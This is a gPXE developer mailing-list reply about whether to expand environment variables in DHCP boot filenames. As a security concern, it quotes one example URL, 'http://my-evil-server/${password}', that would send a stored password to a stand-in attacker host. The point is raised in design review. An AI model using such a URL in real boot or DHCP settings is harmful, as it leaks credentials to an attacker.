[gPXE-devel] FW: [gPXE] environment variable expansion in 'filename'?

Stefan Hajnoczi stefanha at gmail.com
Fri May 21 02:18:08 EDT 2010


On Thu, May 20, 2010 at 7:44 PM, Miller, Shao
<Shao.Miller at yrdsb.edu.on.ca> wrote:
> On a related note, is it horribly objectionable or a bad idea for expand_command  from exec.c to be called from boot_next_server_and_filename from autoboot.c?  Failing that I'll contemplate an embedded script, but lack of conditionals is gPXE scripting could prove to be a touchy thing.

A side-effect of expanding variables in DHCP boot filenames is that it
can be used to expose settings, e.g.:

http://my-evil-server/${password}

This could be a security issue in some cases, since a fake DHCP
response can be used to dump out passwords (perhaps stored on the
network card using non-volatile settings).  Other than that, I think
it would be useful.

Also, I just checked gPXE's URI parsing code to make sure there is no
way of specifying a relative HTTP URL.  That might have worked as an
alternative, but it is not possible.

Stefan


More information about the gPXE-devel mailing list